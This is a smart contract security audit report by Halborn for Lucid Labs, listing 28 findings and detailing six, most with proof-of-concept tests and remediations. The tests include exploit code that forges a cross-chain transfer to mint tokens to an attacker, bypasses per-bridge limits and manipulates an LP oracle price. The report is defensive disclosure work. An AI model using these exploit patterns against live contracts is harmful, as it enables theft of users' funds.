Prepared by:
HALBORN
Last Updated 12/12/2024
Date of Engagement: October 7th, 2024 - November 8th, 2024
100% of all REPORTED Findings have been addressed
All findings
28
Critical
3
High
3
Medium
6
Low
5
Informational
11
Lucid Labs engaged Halborn to conduct a security assessment on their smart contract revisions, beginning on October 7th, 2024 and ending on November 8th, 2024. The security assessment was scoped to the smart contracts provided to the Halborn team.
Commit hashes and further details can be found in the Scope section of this report.
The team at Halborn was provided 5 weeks for the engagement and assigned a full-time security engineer to evaluate the security of the smart contract.
The security engineer is a blockchain and smart-contract security expert with advanced penetration testing and smart-contract hacking skills, and deep knowledge of multiple blockchain protocols.
The purpose of this assessment is to:
Ensure that smart contract functions operate as intended.
Identify potential security issues with the smart contracts.
In summary, Halborn identified several improvements to reduce the likelihood and impact of risks, which were partially addressed by the Lucid Labs team. The main ones were the following:
Implement a quorum calculation compatible with the quadratic voting strategies of the governor.
Add access controls to the asset controller.
Remove the possibility of division by zero in the quadratic vote weight calculation.
Implement a check in burnAndBridgeMulti to ensure all provided adapter addresses are unique.
Create another FlexVotingClient to apply quadratic transformation to individual votes before aggregation.
Implement Alpha Finance's formula for pricing LP tokens.
Halborn performed a combination of manual and automated security testing to balance efficiency, timeliness, practicality, and accuracy regarding the scope of this assessment. While manual testing is recommended to uncover flaws in logic, process, and implementation; automated testing techniques help enhance code coverage and quickly identify items that do not follow the security best practices. The following phases and associated tools were used during the assessment:
Research into architecture and purpose.
Smart contract manual code review and walkthrough.
Graphing out functionality and contract logic/connectivity/functions. (solgraph, draw.io)
Manual assessment of use and safety for the critical Solidity variables and functions in scope to identify any arithmetic related vulnerability classes.
Manual testing by custom scripts.
Static analysis of security for scoped contracts and imported functions. (Slither)
Testnet deployment. (Hardhat, Foundry)
EXPLOITABILITY METRIC | METRIC VALUE | NUMERICAL VALUE |
---|---|---|
Attack Origin (AO) | Arbitrary (AO:A) Specific (AO:S) | 1 0.2 |
Attack Cost (AC) | Low (AC:L) Medium (AC:M) High (AC:H) | 1 0.67 0.33 |
Attack Complexity (AX) | Low (AX:L) Medium (AX:M) High (AX:H) | 1 0.67 0.33 |
IMPACT METRIC | METRIC VALUE | NUMERICAL VALUE |
---|---|---|
Confidentiality (C) | None (C:N) Low (C:L) Medium (C:M) High (C:H) Critical (C:C) | 0 0.25 0.5 0.75 1 |
Integrity (I) | None (I:N) Low (I:L) Medium (I:M) High (I:H) Critical (I:C) | 0 0.25 0.5 0.75 1 |
Availability (A) | None (A:N) Low (A:L) Medium (A:M) High (A:H) Critical (A:C) | 0 0.25 0.5 0.75 1 |
Deposit (D) | None (D:N) Low (D:L) Medium (D:M) High (D:H) Critical (D:C) | 0 0.25 0.5 0.75 1 |
Yield (Y) | None (Y:N) Low (Y:L) Medium (Y:M) High (Y:H) Critical (Y:C) | 0 0.25 0.5 0.75 1 |
SEVERITY COEFFICIENT | COEFFICIENT VALUE | NUMERICAL VALUE |
---|---|---|
Reversibility (R) | None (R:N) Partial (R:P) Full (R:F) | 1 0.5 0.25 |
Scope (S) | Changed (S:C) Unchanged (S:U) | 1.25 1 |
Severity | Score Value Range |
---|---|
Critical | 9 - 10 |
High | 7 - 8.9 |
Medium | 4.5 - 6.9 |
Low | 2 - 4.4 |
Informational | 0 - 1.9 |
Security analysis | Risk level | Remediation Date |
---|---|---|
Quadratic Voting Strategy Incompatible with Quorum Calculation in LucidGovernor | Critical | Solved - 12/03/2024 |
Lack of Access Control in receiveMessage in AssetController Contract | Critical | Solved - 10/23/2024 |
Division by Zero in Quadratic Vote Weight Calculation | Critical | Solved - 11/29/2024 |
Bypass of Bridge Limits in burnAndBridgeMulti Function | High | Solved - 10/23/2024 |
Mathematical Incompatibility Between FlexVotingClient and QuadraticVoteStrategy | High | Solved - 12/05/2024 |
LP Token Price Manipulation Through Reserve | High | Solved - 12/06/2024 |
Front-Running Vulnerability in Two-Step Deployment and Configuration Process | Medium | Solved - 11/05/2024 |
Unhandled Exceptions in CCIP Message Processing Can Lead to Cross-Chain Communication Failure | Medium | Risk Accepted - 11/10/2024 |
UniswapV3 Oracle Vulnerability on L2 Networks Due to Sequencer Downtime | Medium | Solved - 10/29/2024 |
Excess Fees Retention in AssetController | Medium | Solved - 10/23/2024 |
Missing Sequencer Uptime Check in BondChainlinkOracle for L2 Deployments | Medium | Solved - 10/24/2024 |
Uninitialized EIP712 Functionality in VotingControllerUpgradeable __EIP712_init | Medium | Solved - 10/30/2024 |
Incorrect Gas Refund Calculation Due To EIP-150 Rule In Voting Functions | Low | Solved - 12/05/2024 |
Improper Initialization of Timelock Delay in receiveMessage Function | Low | Solved - 11/21/2024 |
Unsafe EIP712 Message Hashing in Cross-Chain Voting Mechanism | Low | Solved - 11/21/2024 |
CREATE3 Factory Is Not Compatible With ZKSYNC Era | Low | Risk Accepted - 11/24/2024 |
Failed ETH Transfers Not Handled in RefundGas Function | Low | Solved - 10/30/2024 |
Useless Token Execution Functions Present in AxelarExecutable Contract | Informational | Solved - 11/20/2024 |
Unlocked Pragma Compiler | Informational | Solved - 11/22/2024 |
Useless Interface Import in WormholeAdapter Contract | Informational | Solved - 11/20/2024 |
Suboptimal Memory Usage in BondChainlinkOracle._getTwoFeedPrice Function | Informational | Solved - 12/05/2024 |
Missing Zero Amount Check in Cross-Chain Bridge Functions | Informational | Solved - 11/20/2024 |
Inconsistent Amount Handling After Fee Deduction in Multi-Bridge Transfer | Informational | Solved - 11/21/2024 |
Inefficient Storage Access Pattern in Message Reception Handling | Informational | Solved - 11/21/2024 |
Missing Duration Validation Enables Zero Division in Base Asset Bridge | Informational | Solved - 11/21/2024 |
Insufficient Delegation Control in Connext Cross-Chain Transfers | Informational | Solved - 11/22/2024 |
Gas Inefficient Role Check Implementation | Informational | Solved - 11/21/2024 |
Owner Can Renounce Ownership | Informational | Acknowledged - 11/20/2024 |
// Critical
The LucidGovernor and LucidGovernorTimelock contracts are designed to work with different voting strategies, including QuadraticVoteStrategy and QuadraticGitcoinPassportStrategy. However, these quadratic voting strategies are incompatible with the current quorum calculation method.
The quorum is calculated in the GovernorVotesQuorumFractionUpgradeable contract, which is inherited by LucidGovernor:
function quorum(uint256 timepoint) public view virtual override returns (uint256) {
return (token.getPastTotalSupply(timepoint) * quorumNumerator(timepoint)) / quorumDenominator();
}
This calculation uses the total token supply, which does not account for the quadratic nature of the voting power. As a result, it is impossible to reach the quorum when using quadratic voting strategies, even if all token holders vote with their full voting power.
For example:
Total Supply: 1,000,000 tokens
Quorum: 50% = 500,000 tokens
Using quadratic voting with no threshold:
Maximum voting power = √1,000,000 = 1,000
Even with 100% participation, maximum voting power (1,000) < quorum (500,000)
This means that even if all token holders vote, the total voting power will always be less than the required quorum, making it impossible to pass any proposal.
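The arithmetic can be reproduced with a short sketch (a simplified model of a pure square-root strategy with no threshold; the variable names are illustrative, not the contracts'):

```typescript
// Simplified model: linear quorum vs. maximum quadratic voting power.
const totalSupply = 1_000_000;
const quorumNumerator = 50;     // 50% quorum fraction
const quorumDenominator = 100;

// Quorum as computed by GovernorVotesQuorumFractionUpgradeable: linear in total supply.
const quorum = (totalSupply * quorumNumerator) / quorumDenominator;

// Maximum aggregate voting power under a pure sqrt strategy, even at 100% turnout.
const maxVotingPower = Math.sqrt(totalSupply);

console.log(quorum, maxVotingPower); // 500000 1000 — the quorum can never be reached
```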
The incompatibility between the quadratic voting strategies and the quorum calculation renders the governance system non-functional when using these strategies. No proposals can pass, effectively breaking the entire governance mechanism and preventing any decision-making through the LucidGovernor contract.
This test can be found in HalbornLucidGovernor.test.ts:
describe("Halborn_QuadraticPOC", () => {
beforeEach(async () => {
await helpers.time.increase(50);
// Make a new proposal
let propId = await governor.propose([ethers.constants.AddressZero], [0], [0x0], "Test Proposal");
// Get proposal id of created proposal
proposalId = (
await governor.hashProposal(
[ethers.constants.AddressZero],
[0],
[0x0],
"0xeac4b25d9db71364cb2a2812dbc47eed8e23f9ffc223b07b7ed2dcef7d02d9bc"
)
).toString();
await helpers.time.increase(50);
// Get proposal snapshot, it is needed to relay the vote
proposalSnapshot = await governor.proposalSnapshot(proposalId);
});
it("[!][-][!] Cannot pass quorum even if all voters voted with all power", async () => {
await governor.connect(user1Signer).castVote(proposalId,1);
await governor.connect(user2Signer).castVote(proposalId,1);
await governor.connect(user3Signer).castVote(proposalId,1);
await governor.connect(ownerSigner).castVote(proposalId,1);
const proposalVotes = await governor.proposalVotes(proposalId);
console.log("[Set-Up]\n\tTotalSupply = 40e18\n\tUser1,User2,User3,Owner have 10e18 tokens\n\t\t=> They all vote for proposalId with their 10e18 votes\n")
console.log("[End Of Set-up]\n");
// array includes against, for, abstain
console.log("Number of votes for proposal = %s",proposalVotes[1]);
let latest = await helpers.time.latest();
console.log("token.getPastTotalSupply(timepoint) = %s",await nativeToken.getPastTotalSupply(latest-1));
const quorumToReach = await governor.quorum(latest-1);
console.log("Quorum To Reach = %s",quorumToReach);
await helpers.time.increase(86400);
console.log("State of proposal after deadline = %s",await governor.state(proposalId));
console.log(" 3 = Defeated");
});
});
Result:
To address this issue, it is recommended to implement a custom quorum calculation method that is compatible with quadratic voting strategies. This can be achieved by overriding the quorum function in the LucidGovernor/Timelock contract to use a quadratic calculation when such a strategy is used.
One idea could be to add a boolean isStrategyQuadratic variable and use a quorumQuadratic function with an if statement to compute the quorum to be reached depending on the strategy.
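A minimal numeric sketch of that idea, assuming the quadratic quorum is scaled against the maximum attainable quadratic voting power (the names and the quorumQuadratic formula are illustrative assumptions, not the team's implementation):

```typescript
// Hypothetical strategy-aware quorum selection (illustrative names and formula).
const totalSupply = 1_000_000;
const quorumNumerator = 50;
const quorumDenominator = 100;
const isStrategyQuadratic = true;

function quorumLinear(): number {
  // Original computation: fraction of the raw total supply.
  return (totalSupply * quorumNumerator) / quorumDenominator;
}

function quorumQuadratic(): number {
  // Scale the same fraction against the maximum attainable quadratic voting power.
  return (Math.sqrt(totalSupply) * quorumNumerator) / quorumDenominator;
}

const quorum = isStrategyQuadratic ? quorumQuadratic() : quorumLinear();
console.log(quorum); // 500 — now reachable under quadratic voting
```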
SOLVED: The Lucid Labs team implemented two strategy deployment paths with two quorum computation paths, which solved the issue.
// Critical
The AssetController.sol contract contains a critical vulnerability in its receiveMessage function. This function lacks proper sender validation, allowing any external actor to call it directly when transfer.threshold != 1. The vulnerable code is located in the receiveMessage function:
function receiveMessage(bytes calldata receivedMsg, uint256 originChain, address originSender) public override nonReentrant {
// Origin sender must be a controller on another chain
if (getControllerForChain(originChain) != originSender) revert Controller_Invalid_Params();
// Decode message
Transfer memory transfer = abi.decode(receivedMsg, (Transfer));
ReceivedTransfer storage receivedTransfer = receivedTransfers[transfer.transferId];
if (transfer.threshold == 1) {
// This part is OK because if msg.sender is arbitrary there is no limit
_useMinterLimits(msg.sender, transfer.amount);
} else {
// Here no check on msg.sender is made and no limit is decreased
ReceivedTransfer storage receivedTransfer = receivedTransfers[transfer.transferId];
// Multi-bridge transfer
if (receivedTransfer.receivedSoFar == 0) {
receivedTransfer.recipient = transfer.recipient;
receivedTransfer.amount = transfer.amount;
receivedTransfer.unwrap = transfer.unwrap;
receivedTransfer.receivedSoFar = 1;
receivedTransfer.threshold = transfer.threshold;
receivedTransfer.originChainId = originChain;
receivedTransfer.executed = false;
} else {
receivedTransfer.receivedSoFar++;
}
// Check if the transfer can be executed
if (receivedTransfer.receivedSoFar >= receivedTransfer.threshold) {
emit TransferExecutable(transfer.transferId);
}
}
}
The function fails to verify the caller's identity (msg.sender) in the multi-bridge transfer path, allowing any address to invoke it, send the same transaction enough times to pass the threshold, and create or modify transfer records, when only allowed adapters should be able to call this code path.
The exploit allows bypassing the intended authorization checks and leads to unauthorized token minting, theft of funds, or disruption of the entire cross-chain transfer system.
This test can be added to AssetController.test.ts:
describe("Halborn_burnAndBridge", () => {
let attackerSigner: SignerWithAddress;
beforeEach(async () => {
[attackerSigner] = await ethers.getSigners();
// await helpers.time.increase(2000);
relayerFee = ethers.utils.parseEther("0.001");
amountToBridge = ethers.utils.parseEther("4000");
// Approval needs to be given because controller will burn the tokens
await sourceToken.connect(ownerSigner).approve(sourceController.address, amountToBridge);
});
it("Attacker can directly call receiveMessage and create a fake transfer", async () => {
const fakeTransferId = ethers.utils.keccak256(ethers.utils.toUtf8Bytes("fake_transfer"));
const fakeAmount = ethers.utils.parseEther("1000");
const fakeOriginChain = 100; // A chain ID that doesn't exist in our setup
const fakeOriginSender = sourceController.address;
/**
struct Transfer {
address recipient;
uint256 amount;
bool unwrap;
uint256 threshold;
bytes32 transferId;
}
*/
// Create a fake transfer message
const fakeTransfer = {
recipient: attackerSigner.address,
amount: fakeAmount,
unwrap: false,
threshold: 2, // Attacker calls receiveMessage twice to reach this threshold
transferId: fakeTransferId
};
// Encode the fake transfer
const encodedTransfer = ethers.utils.defaultAbiCoder.encode(
["tuple(address recipient, uint256 amount, bool unwrap, uint256 threshold, bytes32 transferId)"],
[fakeTransfer]
);
// Call receiveMessage directly from the attacker
await sourceController.connect(attackerSigner).receiveMessage(
encodedTransfer,
fakeOriginChain,
fakeOriginSender
);
await sourceController.connect(attackerSigner).receiveMessage(
encodedTransfer,
fakeOriginChain,
fakeOriginSender
);
// Check if the transfer was created and is executable
const transferDetails = await sourceController.receivedTransfers(fakeTransferId);
expect(transferDetails.recipient).to.equal(attackerSigner.address);
expect(transferDetails.amount).to.equal(fakeAmount);
expect(transferDetails.receivedSoFar).to.equal(2);
expect(transferDetails.threshold).to.equal(2);
expect(transferDetails.originChainId).to.equal(fakeOriginChain);
expect(transferDetails.executed).to.be.false;
// Verify that the TransferExecutable event was emitted
await expect(sourceController.connect(attackerSigner).receiveMessage(
encodedTransfer,
fakeOriginChain,
fakeOriginSender
)).to.emit(sourceController, "TransferExecutable").withArgs(fakeTransferId);
await sourceController.connect(attackerSigner).execute(fakeTransferId);
});
});
Result:
To address this vulnerability, implement strict sender validation at the beginning of the receiveMessage function in AssetController.sol, as is done in other controllers:
function receiveMessage(bytes calldata receivedMsg, uint256 originChain, address originSender) public override nonReentrant {
if (!isSenderApproved(msg.sender)) revert Controller_Unauthorised();
// Existing function logic...
}
It is also recommended to ensure receivedTransfer.threshold > 0.
SOLVED: The Lucid Labs team implemented a msg.sender check.
// Critical
The QuadraticGitcoinPassportStrategy contract contains a critical division-by-zero vulnerability in its vote weight calculation logic. The issue occurs in the proportional match rate calculation for Gitcoin Passport scores:
function _applyScore(address account, uint256 votes) internal view returns (uint256 total) {
uint256 score = _getPassportScore(account);
if (score < scoreAmplifiers[0]) {
// ... //
} else if (score < scoreAmplifiers[1]) {
// Proportional match between user-defined scoreRanges[1] and scoreRanges[2] for scores between scoreAmplifiers[0] and scoreAmplifiers[1]
uint256 matchRate = scoreRanges[1] +
((score - scoreAmplifiers[0]) * (scoreRanges[2] - scoreRanges[1])) /
(scoreAmplifiers[1] - scoreAmplifiers[1]); //E @AUDIT division by 0
total = votes + (votes * matchRate) / 100;
} else {
// .. //
}
return total;
}
The denominator (scoreAmplifiers[1] - scoreAmplifiers[1]) subtracts a value from itself, resulting in zero. When this code path is executed for scores that fall between scoreAmplifiers[0] and scoreAmplifiers[1], the transaction reverts due to division by zero and the voter cannot cast votes.
Impact:
The vote calculation function reverts for all Gitcoin Passport scores between scoreAmplifiers[0] and scoreAmplifiers[1].
The voting power adjustment is non-functional for affected score ranges.
Participants with scores in this range are unable to cast votes.
The quadratic voting mechanism is broken for a significant portion of the scoring range.
This test can be found in QuadraticGitcoinPassportPOC (IGitcoinPassportDecoder mocked to return a value that triggers the division by zero):
describe("Halborn_QuadraticGitcoinPassportPOC", () => {
beforeEach(async () => {
await helpers.time.increase(50);
// Make a new proposal
let propId = await governor.propose([ethers.constants.AddressZero], [0], [0x0], "Test Proposal");
// Get proposal id of created proposal
proposalId = (
await governor.hashProposal([ethers.constants.AddressZero],[0],[0x0],"0xeac4b25d9db71364cb2a2812dbc47eed8e23f9ffc223b07b7ed2dcef7d02d9bc")
).toString();
await helpers.time.increase(50);
// Get proposal snapshot, it is needed to relay the vote
proposalSnapshot = await governor.proposalSnapshot(proposalId);
});
it("[!][-][!] Division By 0", async () => {
await governor.connect(user1Signer).castVote(proposalId,1);
});
});
Result:
It is recommended to replace the current implementation with the correct linear interpolation formula:
uint256 matchRate = scoreRanges[1] +
((score - scoreAmplifiers[0]) * (scoreRanges[2] - scoreRanges[1])) /
(scoreAmplifiers[1] - scoreAmplifiers[0]);
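As a sanity check, the corrected denominator makes the match rate interpolate linearly between the two breakpoints. A small sketch with hypothetical breakpoint and range values:

```typescript
// Illustrative linear interpolation of the match rate; the concrete
// scoreAmplifiers/scoreRanges values below are made up for the example.
const scoreAmplifiers = [20, 40]; // hypothetical score breakpoints
const scoreRanges = [0, 10, 50];  // hypothetical match rates (%)

function matchRate(score: number): number {
  // Corrected denominator: scoreAmplifiers[1] - scoreAmplifiers[0]
  return scoreRanges[1] +
    ((score - scoreAmplifiers[0]) * (scoreRanges[2] - scoreRanges[1])) /
    (scoreAmplifiers[1] - scoreAmplifiers[0]);
}

// The lower breakpoint maps to scoreRanges[1], the upper to scoreRanges[2].
console.log(matchRate(20), matchRate(30), matchRate(40)); // 10 30 50
```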
SOLVED: The Lucid Labs team fixed the division by zero and added checks in the constructor.
// High
The AssetController contract's burnAndBridgeMulti function allows users to bypass individual bridge limits. The function does not verify the uniqueness of the provided adapter addresses, enabling users to submit duplicate addresses and bypass the multi-bridge limit system.
function burnAndBridgeMulti(
address recipient,
uint256 amount,
bool unwrap,
uint256 destChainId,
address[] memory adapters, //E @AUDIT duplicates not checked
uint256[] memory fees
) public payable nonReentrant whenNotPaused {
// ... [other code]
uint256 _currentLimit = burningCurrentLimitOf(address(0));
if (_currentLimit < amount) revert IXERC20_NotHighEnoughLimits();
_useBurnerLimits(address(0), amount);
// ... [other code]
_relayTransfer(transfer, destChainId, adapters, fees);
}
The function uses a separate limit check for multi-bridge transfers (burningCurrentLimitOf(address(0))), which can be exploited to bypass individual bridge limits because there is no verification that the adapters passed to burnAndBridgeMulti (address[] memory adapters) are unique.
This vulnerability allows users to exceed the intended limits for individual bridges. An attacker can first use the burnAndBridge function to reach the limit of a single bridge, then use burnAndBridgeMulti with an array containing the same bridge address multiple times. This bypasses the individual bridge limit and charges the multi-bridge limit (address(0)) for the same bridge.
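The limit accounting can be modeled in a few lines (a simplified sketch; names and numbers are illustrative, not the contract's):

```typescript
// Toy model of the two limit buckets: one per adapter, plus the shared
// address(0) bucket consumed by multi-bridge transfers.
const limits = new Map<string, number>([
  ["bridgeA", 1000],
  ["0x0", 1000], // address(0) bucket used by burnAndBridgeMulti
]);

function burnAndBridge(adapter: string, amount: number): boolean {
  const left = limits.get(adapter)!;
  if (left < amount) return false; // IXERC20_NotHighEnoughLimits
  limits.set(adapter, left - amount);
  return true;
}

function burnAndBridgeMulti(adapters: string[], amount: number): boolean {
  // Only the shared address(0) limit is checked; duplicate adapters
  // in the array are not rejected.
  return burnAndBridge("0x0", amount);
}

burnAndBridge("bridgeA", 1000); // exhausts bridgeA's individual limit
const bypass = burnAndBridgeMulti(["bridgeA", "bridgeA"], 1000);
console.log(bypass); // true: 2000 total can be routed through bridgeA
```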
This test can be found in AssetController.test.ts:
describe("Halborn_burnAndBridge", () => {
beforeEach(async () => {
// await helpers.time.increase(2000);
relayerFee = ethers.utils.parseEther("0.001");
amountToBridge = ethers.utils.parseEther("4000");
// Approval needs to be given because controller will burn the tokens
await sourceToken.connect(ownerSigner).approve(sourceController.address, amountToBridge);
});
/*it("Burn and bridge with address(0) as adapter", async () => {
//await sourceController.setLimits(ethers.constants.AddressZero, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
//await destController.setLimits(ethers.constants.AddressZero, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
//const tx = await sourceController.burnAndBridge(user1Signer.address, amountToBridge, false, 100, ethers.constants.AddressZero, {
// value: relayerFee,
//});
await expect(sourceController.burnAndBridge(user1Signer.address, amountToBridge, false, 100, ethers.constants.AddressZero, {
value: relayerFee,
})).to.be.reverted;
});*/
it("Bypass Limits by sending same adapters in array", async () => {
// await sourceController.setLimits(ethers.constants.AddressZero, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
// await destController.setLimits(ethers.constants.AddressZero, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
// await sourceController.setLimits(sourceBridgeAdapter.address, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
// await destController.setLimits(destBridgeAdapter.address, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
// can go until 2000 for one bridge
console.log("[-] burnAndBridge is used until sourceBridgeAdapter => 1000");
const tx = await sourceController.burnAndBridge(user1Signer.address,ethers.utils.parseEther("1000"), false, 100, sourceBridgeAdapter.address, {
value: relayerFee,
});
await expect(tx).to.emit(sourceController, "TransferCreated");
// Bypass Limits => Revert
await expect(sourceController.burnAndBridge(user1Signer.address,ethers.utils.parseEther("1"), false, 100, sourceBridgeAdapter.address, {
value: relayerFee,
})).to.be.revertedWithCustomError(sourceController, "IXERC20_NotHighEnoughLimits");
// Use burnAndBridgeMulti with same adapter
console.log("[-] burnAndBridgeMulti is used to bypass limit of sourceBridgeAdapter => 2000");
const tx2 = await sourceController.burnAndBridgeMulti(
user1Signer.address,
ethers.utils.parseEther("1000"),
false,
100,
[sourceBridgeAdapter.address, sourceBridgeAdapter.address],
[relayerFee, relayerFee],
{
value: relayerFee.mul(2),
}
);
await expect(tx2).to.emit(sourceController, "TransferCreated");
await expect(sourceController.burnAndBridgeMulti(
user1Signer.address,
ethers.utils.parseEther("6"), //E fees not burned so 1 would not revert
false,
100,
[sourceBridgeAdapter.address, sourceBridgeAdapter.address],
[relayerFee, relayerFee],
{
value: relayerFee.mul(2),
}
)).to.be.revertedWithCustomError(sourceController, "IXERC20_NotHighEnoughLimits");
console.log("[OK] Bypass worked");
});
});
Result: 2x the limit of a single bridge can be used.
It is recommended to implement a check in burnAndBridgeMulti to ensure all provided adapter addresses are unique:
function checkUniqueness(address[] memory adapters) internal pure returns (bool) {
uint256 length = adapters.length;
for (uint256 i = 0; i < length - 1; i++) {
for (uint256 j = i + 1; j < length; j++) {
if (adapters[i] == adapters[j]) {
return false;
}
}
}
return true;
}
SOLVED: A new function checkUniqueness() has been added to check for adapter uniqueness.
// High
An incompatibility has been discovered when FlexVotingClient contract is used with a quadratic Strategy for votes because FlexVotingClient
contract computes voting weights linearly while the totalWeight
limit for vote casting is transformed quadratically, creating a fundamental mathematical conflict that leads to transaction reverts.
The conflict occurs between these two computations:
uint128 _forVotesToCast = SafeCast.toUint128(
(_votingWeightAtSnapshot * _proposalVote.forVotes) / _totalRawBalanceAtSnapshot
);
// getVotes() :
_applyStrategy(account, token.getPastVotes(account, timepoint))
// _applyStrategy() :
uint256 weightSqrt = Math.sqrt((weight - quadraticThreshold) / 10 ** thresholdDecimals);
totalWeight = weightSqrt * 10 ** thresholdDecimals + quadraticThreshold;
And the system enforces this check in GovernorCrossCountingFractional.sol:
if (_newWeight > totalWeight) {
revert GovernorCrossCountingFractionalUpgradeable_VoteWeightWouldExceedWeight();
}
The problem is that votes cast from FlexVotingClient to the Governor (represented by _newWeight) are not transformed, while the total power of FlexVotingClient (represented by token.getPastVotes(FlexVotingClient.sol, timepoint)) is square-rooted when the strategy is applied, so two critical scenarios are possible:
Early users can express their votes until the weight of votes cast from FlexVotingClient to the Governor exceeds sqrt(token.getPastVotes(FlexVotingClient.sol, timepoint)), and then "late" users can no longer express their votes.
The first user expressing votes has more voting power than sqrt(token.getPastVotes(FlexVotingClient.sol, timepoint)), and FlexVotingClient is DoSed from casting votes for the proposal.
A simple example explaining scenario 2, given:
Raw Balance = 10,000 tokens
Number of Voters = 90
Individual Vote = 111 tokens
Results in:
totalWeight = sqrt(10,000) = 100
Linear vote calculation of a user's votes: 111
Check fails: 111 > 100 => DoSed
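The failing check in the example can be reproduced directly (numbers taken from the example above, assuming a pure sqrt strategy with no threshold):

```typescript
// Raw pool balance vs. the quadratically reduced cap on cast votes.
const rawBalance = 10_000;                 // tokens held by the FlexVotingClient
const totalWeight = Math.sqrt(rawBalance); // 100, after the quadratic strategy
const individualVote = 111;                // one voter's linear vote weight

// The check in GovernorCrossCountingFractional: _newWeight > totalWeight => revert
const reverts = individualVote > totalWeight;
console.log(totalWeight, reverts); // 100 true
```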
The system is completely non-functional. All vote-casting transactions from FlexVotingClient will revert due to exceeding the quadratically reduced totalWeight limit. This breaks the core voting functionality of the protocol.
This test can be found in TokenFlexVotingQuadratic.test.ts:
it("Should cast the vote with Quadratic Strategy", async () => {
await vesting.connect(user1Signer).expressVote(governor.address, proposalId, 0);
await helpers.time.increase(1);
await vesting.castVote(governor.address, proposalId);
expect(await governor.hasVoted(proposalId, vesting.address)).to.equal(true);
const votes = await governor.proposalVotes(proposalId);
expect(votes[0]).to.equal(ethers.utils.parseEther("250"));
});
Result:
It is recommended to create another FlexVotingClient that applies the quadratic transformation to individual votes before aggregation:
mapping(address => uint256) private quadraticBalances;
function _updateQuadraticBalance(address user) internal {
uint256 rawBalance = _rawBalanceOf(user);
quadraticBalances[user] = sqrt(rawBalance);
}
function _getVotesToCast(uint256 rawVotes, uint256 totalRawBalance) internal pure returns (uint256) {
uint256 individualWeight = sqrt(rawVotes);
return (individualWeight * totalWeight) / sqrt(totalRawBalance);
}
Another option would be to modify castVoteWithReasonAndParams() when a quadratic strategy is used in the governor.
SOLVED: The Lucid Labs team decided never to deploy a FlexVotingClient with a quadratic strategy; a note has been added to the FlexVotingClient contract.
// High
The BondSteerOracle contract implements a flawed methodology for calculating the price of Steer Protocol LP tokens. The _currentPrice
function uses spot reserves to determine the LP token value, which is susceptible to manipulation:
function _currentPrice(ERC20 quoteToken_, ERC20 payoutToken_) internal view override returns (uint256) {
SteerParams memory params = priceFeedParams[quoteToken_][payoutToken_];
(uint256 reserve0, uint256 reserve1) = params.steerVault.getTotalAmounts();
uint256 totalSupply = params.steerVault.totalSupply();
uint256 lpPrice;
if (params.priceInToken0) {
lpPrice = (reserve0 * 2 * PRECISION) / (totalSupply * (10 ** params.token0Decimals));
} else {
lpPrice = (reserve1 * 2 * PRECISION) / (totalSupply * (10 ** params.token1Decimals));
}
return PRECISION / lpPrice;
}
This implementation is vulnerable because:
It relies on spot reserves (getTotalAmounts()), which are easily manipulable through large trades or flash loans.
The calculation does not account for potential imbalances in the pool or market conditions.
There are no safeguards against extreme price movements or manipulation attempts.
This test can be found in BondFixedTermSteerOFDA.test.ts (with a modified MockSteerPool):
it("should demonstrate price manipulation through reserve changes", async () => {
// Configure oracle
const encodedSteerConfig = ethers.utils.defaultAbiCoder.encode(
["tuple(address, bool)"],
[[steerToken.address, false]]
);
await oracle.setPair(steerToken.address, payoutToken.address, true, encodedSteerConfig);
// Get initial LP token price
const initialPrice = await oracle["currentPrice(address,address)"](steerToken.address, payoutToken.address);
console.log("Initial LP token price:", initialPrice.toString());
// Attacker manipulates reserves by adding large amount of liquidity with imbalanced reserves
// This creates a price discrepancy
await steerToken.setToken0Amount(ethers.utils.parseEther("10000")); // Large amount of token0
await steerToken.setToken1Amount(ethers.utils.parseEther("100")); // Keep token1 small
await steerToken._setTotalSupply(ethers.utils.parseEther("1000")); // Increase total supply proportionally
// Get manipulated price
const manipulatedPrice = await oracle["currentPrice(address,address)"](steerToken.address, payoutToken.address);
console.log("Manipulated LP token price:", manipulatedPrice.toString());
// Create bond market with manipulated price
const encodedParams = ethers.utils.defaultAbiCoder.encode(
["tuple(address, address, address, address, uint48, uint48, bool, uint256, uint48, uint48, uint48, uint48)"],
[
[
payoutToken.address,
steerToken.address,
ethers.constants.AddressZero,
oracle.address,
"20000", // baseDiscount
"50000", // maxDiscountFromCurrent
false, // capacityInQuote
ethers.utils.parseEther("10000"), // capacity
"360000", // depositInterval
vestingLength,
"0", // start
bondDuration,
]
]
);
await auctioner.createMarket(encodedParams);
const bondMarketPrice = await auctioner.marketPrice(0);
console.log("Bond market price:", bondMarketPrice.toString());
// Verify manipulation occurred
expect(manipulatedPrice).to.be.gt(initialPrice);
// Attacker can now remove the extra liquidity
await steerToken.setToken0Amount(ethers.utils.parseEther("100"));
await steerToken.setToken1Amount(ethers.utils.parseEther("100"));
await steerToken._setTotalSupply(ethers.utils.parseEther("100"));
const finalPrice = await oracle["currentPrice(address,address)"](steerToken.address, payoutToken.address);
console.log("Final LP token price:", finalPrice.toString());
// Price should have been manipulated up and then back down
expect(finalPrice).to.be.lt(manipulatedPrice);
// Calculate manipulation percentage
const manipulationPercent = manipulatedPrice.sub(initialPrice).mul(100).div(initialPrice);
console.log("Price manipulation percentage:", manipulationPercent.toString(), "%");
});
Here is the result:
It is recommended to implement Alpha Finance's formula for pricing LP tokens:
2 * sqrt(p0 * p1) * sqrt(k) / L
Where:
p0 and p1 are the time-weighted average prices (TWAPs) of the underlying assets
k is the constant product invariant (k = r0 * r1)
L is the total supply of LP tokens
This approach calculates the LP token price based on TWAPs and the invariant k, rather than using manipulable spot reserves. It provides resistance against flash loan attacks and other forms of price manipulation.
Reference: CMichel's article on pricing LP tokens.
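A sketch contrasting the spot-reserve valuation with the fair pricing formula (all numbers are illustrative; p0 and p1 stand in for the TWAPs of the underlying assets):

```typescript
// Naive valuation: values the pool from manipulable spot reserves.
function spotLpPrice(r0: number, r1: number, p0: number, p1: number, L: number): number {
  return (r0 * p0 + r1 * p1) / L;
}

// Fair valuation (Alpha Finance formula): depends only on TWAPs and the
// invariant k, which a swap inside the pool leaves unchanged.
function fairLpPrice(r0: number, r1: number, p0: number, p1: number, L: number): number {
  const k = r0 * r1; // constant product invariant
  return (2 * Math.sqrt(p0 * p1) * Math.sqrt(k)) / L;
}

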